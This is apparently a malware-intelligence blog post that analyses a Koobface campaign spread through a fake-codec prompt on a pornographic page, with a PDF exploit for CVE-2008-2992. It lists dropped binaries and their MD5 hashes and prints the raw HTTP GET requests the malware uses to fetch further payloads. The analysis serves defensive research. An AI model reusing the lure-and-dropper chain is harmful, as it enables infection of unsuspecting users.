MalwareIntelligence is a site dedicated to research on all matters relating to anti-malware security, criminology computing and information security in general, always from a perspective closely related to the field of intelligence.


Circuit Koobface from (BKCNET "SIA" IZZI)

After several months without news of Koobface, at least on typical propagation using as cover to attack the classic fake YouTube screen, is back with another season of propagation.

This time, its spread continues through visual social engineering, but not in the template of course YouTube video but uses a page with pornographic content.

As shown in the catch, when you attempt to access any of the assumptions videos, a small window warns about the need to download a codec. By accepting, you download Koobface under the cover of a binary call codec.exe (5910e59d592781cec3234abf57f8d000), from IP address that resolves domain This IP is used for the propagation of Koobface since March 2010.

In addition, the page contains an embedded script that redirects traffic to download a PDF file that contains an exploit for CVE-2008-2992.

Also at the same IP but makes it clear that his administration is being performed through a known crimeware: YES Exploit System.

The binary executable codec.exe is packed with UPX (UPX 0.89.6 - 1.02/1.05-1.22 -> Markus&Laszlo). When you turn generates a BAT (she committed suicide) with instructions to C&C, providing access to from which drops the following malicious code:
  • wsc.exe (80427b754b11de653758dd5e1ba3de1c) Koobface
  • dm.exe (b658d9b812454e99b2915ab2e9594b94) TDSS

GET /dm.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Connection: Keep-Alive

GET /wsc.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Connection: Keep-Alive

The BAT contains the following statement of connection and sending information to C&C:

This domain is on the same IP address with instructions to download other malware:
  • pi.exe (08f214c0bd61faba2f8ed89cb8f40bc0) FakeAV

This is a rogue copy of Security essentials 2010. It connects to ( from which it downloads the file firewall.dll (a0160e8ede623b1df7d677b8d52fdc48) and ( from which it downloads exe.exe (5839ca78aab96724aa646789ebc24305 - Olmarik) with a very low detection rate.

In short, the circuit that runs koobface from BKCNET "SIA" IZZI involves different parts of the area of crime that are interrelated to each other with the same goal: $$$$$ (feedback to the underground economy), leaving behind a real portfolio malware.

Under is managed by a known crimeware costing underground market around $ 1000 and to be executed in charge of pointing the download of other malware on the victim computer, managed under the coordination of business members that increase their profits for each successful installation of the rogue.

Related information
Symbiosis malware present. Koobface
Koobface campaign spread through Blogspot
YES Exploit System and Crimeware-as-a-Service
YES Exploit System. Official Business Partner’s

0 comentarios:

Post a Comment